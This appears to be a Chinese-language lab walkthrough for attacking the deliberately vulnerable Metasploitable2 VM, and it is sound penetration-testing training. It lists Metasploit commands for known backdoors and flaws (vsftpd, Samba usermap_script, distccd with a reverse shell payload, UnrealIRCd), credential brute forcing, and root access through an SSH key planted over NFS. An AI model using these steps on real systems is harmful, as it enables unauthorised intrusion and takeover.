metasploit2-practice
Metasploittable2打靶教程本次靶机练习主要熟悉:高危端口利用;metasploit中search,show及各个模块使用。一、环境准备
1.把靶场放在vmware打开,启用nat模式:
https://img2023.cnblogs.com/blog/2859604/202302/2859604-20230223093335686-765824364.png
2.启用kali
https://img2023.cnblogs.com/blog/2859604/202302/2859604-20230223093335372-1747773307.png
二、信息收集
3.确认目标:
使用nmap扫描该局域网,确认目标开放端口服务信息。
sudo nmap -sS 192.168.1.0/24
https://img2023.cnblogs.com/blog/2859604/202302/2859604-20230223093335089-821042787.png
https://img2023.cnblogs.com/blog/2859604/202302/2859604-20230223093334698-874047408.png
这是后面复现完第一张漏洞时,查看靶机漏洞清单,发现少了些端口,还以为是自己靶机没开这些端口呢,结果是自己nmap端口没扫完。这是后面重新扫描的第二张,可见最好平时做实战及靶机时最好扫完 全端口,以免遗漏高端口漏洞。
4.确认操作系统
sudo nmap -O 192.168.1.0/24
https://img2023.cnblogs.com/blog/2859604/202302/2859604-20230223093334194-1868451979.png
也可以和之前的命令一起用
例:sudo nmap -sS -O 192.168.1.0/24
实战中:在确认目标IP后,建议使用:sudo nmap -PN -O 192.168.1.130
更详细服务信息,以便收集已公开漏洞
sudo nmap -sS 192.168.1.130
https://img2023.cnblogs.com/blog/2859604/202302/2859604-20230223093333784-1102429221.png
漏洞清单:
https://img2023.cnblogs.com/blog/2859604/202302/2859604-20230223093333307-1460374309.png
从顺序来吧
21(ftp)
vsftpd是在UNIX 类操作系统上运行的一个完全免费的、开放源代码的ftp服务器软件
可用msf扫描该服务,该ftp正常来说只有匿名访问和弱口令。
匿名访问:
https://img2023.cnblogs.com/blog/2859604/202302/2859604-20230223093332983-872117388.png
1.启用msf
msfconsole2.寻找漏洞代码 (vsftpd),查看该服务有无漏洞
search vsftpdhttps://img2023.cnblogs.com/blog/2859604/202302/2859604-20230223093332602-1852156183.png
https://img2023.cnblogs.com/blog/2859604/202302/2859604-20230223093332219-2040066087.png
3.使用
use 0https://img2023.cnblogs.com/blog/2859604/202302/2859604-20230223093331951-1616356077.png
显示payloads
show payloadshttps://img2023.cnblogs.com/blog/2859604/202302/2859604-20230223093331658-1301481860.png
只有一个就自动选择
也可手动定义payload
https://img2023.cnblogs.com/blog/2859604/202302/2859604-20230223093331368-2099760427.png
4.查看配置
show optionshttps://img2023.cnblogs.com/blog/2859604/202302/2859604-20230223093331055-1500834718.png
5.设置目标
set rhost 192.168.80.130https://img2023.cnblogs.com/blog/2859604/202302/2859604-20230223093330769-100440551.png
6.运行
run 或者exploithttps://img2023.cnblogs.com/blog/2859604/202302/2859604-20230223093330480-1724806015.png
直接root权限
22(ssh)
Searchssh_login 搜索模块
Useauxiliary/scanner/ssh/ssh_login 使用模块
SetRHOST 192.168.1.130 设置目标地址
Set USER_FILEXXX 设置用户字典路径
Set PASS_FILEXXX 设置字典密码路径
Set THREADS 100 设置线程是100
Runhttps://img2023.cnblogs.com/blog/2859604/202302/2859604-20230223093330188-901474483.png
爆破成功msfadmin:msfadmin
https://img2023.cnblogs.com/blog/2859604/202302/2859604-20230223093329807-1502587555.png
23(telnet)
search telnet_login
use 1
SetRHOST 192.168.1.134 设置目标地址
Set USER_FILEXXX 设置用户字典路径
Set PASS_FILEXXX 设置字典密码路径
Set THREADS 100 设置线程是100
Runhttps://img2023.cnblogs.com/blog/2859604/202302/2859604-20230223093329333-953724296.png
https://img2023.cnblogs.com/blog/2859604/202302/2859604-20230223093329035-1734782544.png
https://img2023.cnblogs.com/blog/2859604/202302/2859604-20230223093328596-1049916203.png
80(php-cgi)
先访问该该网站是什么站:
https://img2023.cnblogs.com/blog/2859604/202302/2859604-20230223093328046-1582054339.png
[*]Mutillidae 和 DVWA这两个练习平台就不说了
[*]扫描目录发现漏洞点
[*]2012年的漏洞
server API 是CGI方式运行的,这个方式在PHP存在漏洞-Cgi参数注入
[*]phpinfo.php ===>php-cgi
[*]https://img2023.cnblogs.com/blog/2859604/202302/2859604-20230223093327738-892128698.png
[*]https://img2023.cnblogs.com/blog/2859604/202302/2859604-20230223093327405-1966596811.png
[*]phpadmin
[*]https://img2023.cnblogs.com/blog/2859604/202302/2859604-20230223093327095-454217310.png
[*]链
search php-cgi
use 0
set rhost 192.168.1.130
runhttps://img2023.cnblogs.com/blog/2859604/202302/2859604-20230223093326788-105776460.png
111(RPC)
auxiliary/scanner/misc/sunrpc_portmapperhttps://img2023.cnblogs.com/blog/2859604/202302/2859604-20230223093326496-1066702027.png
只能拿来ddos
139,445(smba)
https://img2023.cnblogs.com/blog/2859604/202302/2859604-20230223093326144-1267569467.png
1.Samba 在配置了可写文件共享并启用了“宽链接”(默认打开)时,也可以用作某种后门来访问不打算共享的文件。
smbclient -L //192.168.1.130https://img2023.cnblogs.com/blog/2859604/202302/2859604-20230223093325787-325662179.png
use auxiliary/admin/smb/samba_symlink_traversal
set rhost 192.168.1.130
set SMBSHARE tmp
runhttps://img2023.cnblogs.com/blog/2859604/202302/2859604-20230223093325437-1666753162.png
smbclient //192.168.1.130/tmphttps://img2023.cnblogs.com/blog/2859604/202302/2859604-20230223093325114-1611513999.png
SambaMS-RPC Shell 命令注入漏洞
search samba
use exploit/multi/samba/usermap_script
set rhost xxxx
runhttps://img2023.cnblogs.com/blog/2859604/202302/2859604-20230223093324775-924592991.png
512.513.514 (r)
TCP 端口 512、513 和 514 被称为“r”服务,并且被错误配置为允许从任何主机进行远程访问
sudo apt-get install rsh-client
rlogin -l root 192.168.1.130https://img2023.cnblogs.com/blog/2859604/202302/2859604-20230223093324295-512304804.png
1099(java_rmi)
https://img2023.cnblogs.com/blog/2859604/202302/2859604-20230223093323756-1973423188.png
原理:Java RMI Server 的RMI注册表和RMI激活服务的默认配置存在安全漏洞,可被利用导致
use exploit/multi/misc/java_rmi_serverhttps://img2023.cnblogs.com/blog/2859604/202302/2859604-20230223093323442-685635279.png
1524(ingreslock):
1524端口 ingreslock Ingres 数据库管理系统(DBMS)锁定服务
利用telnet命令连接目标主机的1524端口,直接获取root权限。
Ingreslock后门程序监听在1524端口,连接到1524端口就可以直接获得root权限, 经常被用于入侵一个暴露的服务器。
https://img2023.cnblogs.com/blog/2859604/202302/2859604-20230223093323117-618016758.png
ingreslock 端口是为受感染服务器添加后门的流行选择。访问它很容易:
2049(NFS)
NFS全称Network File System,即网络文件系统,属于网络层,主要用于网络间文件的共享,最早由sun公司开发。
复现环境:Kali2017、Metasploit2
复现思路:利用NFS服务将本地主机的ssh公钥传输到目标主机上,再利用ssh连接到目标主机
1.kali下连接靶机的NFS服务
sudo apt-get install nfs-common
showmount -e 192.168.1.130
mkdir /tmp/192.168.1.130
sudo mount -t nfs 192.168.1.130:/ /tmp/192.168.1.130/
cd /tmp/192.168.1.130/
ls -lahttps://img2023.cnblogs.com/blog/2859604/202302/2859604-20230223093322741-1798587894.png
2.将本地主机的ssh公钥发送到目标主机并通过ssh连接靶机
ssh-keygen
cat .ssh/id_rsa.pub >> /tmp/192.168.1.130/root/.ssh/authorized_keys
ssh root@192.168.1.130不过这里遇到点小坑
https://img2023.cnblogs.com/blog/2859604/202302/2859604-20230223093322379-193635239.png
https://img2023.cnblogs.com/blog/2859604/202302/2859604-20230223093322027-254697507.png
解决办法:链接
ssh -o HostKeyAlgorithms=+ssh-rsa -o PubkeyAcceptedKeyTypes=+ssh-rsa root@192.168.1.130https://img2023.cnblogs.com/blog/2859604/202302/2859604-20230223093321557-149792946.png
3306(mysql)
mysql空密码:
使用模块:use auxiliary/scanner/mysql/mysql_loginsearch mysql_login
use 0
set username roothttps://img2023.cnblogs.com/blog/2859604/202302/2859604-20230223093321069-1902816275.png
3632(distccd)
除了上一节中的恶意后门,一些服务本质上几乎就是后门。
search distccd
use 0
set rhost 192.168.1.130这里如果我们用默认的payload会no session,这里切换下payload
show payloads
set payload cmd/unix/reverse_ruby https://img2023.cnblogs.com/blog/2859604/202302/2859604-20230223093320736-571532234.png
https://img2023.cnblogs.com/blog/2859604/202302/2859604-20230223093320383-101619346.png
5432(postgresql)
1.爆破:
auxiliary/scanner/postgres/postgres_login postgresql密码:postgres
https://img2023.cnblogs.com/blog/2859604/202302/2859604-20230223093320015-411121538.jpg
2.Linux安装的PostgreSQL, postgres服务帐户可以写到/tmp目录,还有共享库,允许任意执行代码
这是nmap的指纹
https://img2023.cnblogs.com/blog/2859604/202302/2859604-20230223093319670-700896193.png
也可以通过msf的模块:canner/postgres/postgres_version
https://img2023.cnblogs.com/blog/2859604/202302/2859604-20230223093319275-88231174.png
后渗透利用推荐
5900(vnc)
vnc 密码: password
https://img2023.cnblogs.com/blog/2859604/202302/2859604-20230223093318895-1733368759.jpg
6667(IRC)
根据nmap指纹信息
searchUnrealIRCd
use 0 || use exploit/unix/irc/unreal_ircd_3281_backdoor
set rhost 192.168.1.130
runhttps://img2023.cnblogs.com/blog/2859604/202302/2859604-20230223093318543-982819188.png
一把梭失败,检查错误:发现pay失败,切换payload。
查看可用payload
show payloads
https://img2023.cnblogs.com/blog/2859604/202302/2859604-20230223093318098-1776301782.png
8180(tomact)
暴力破解账号密码:tomcat;tomcat
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
页:
[1]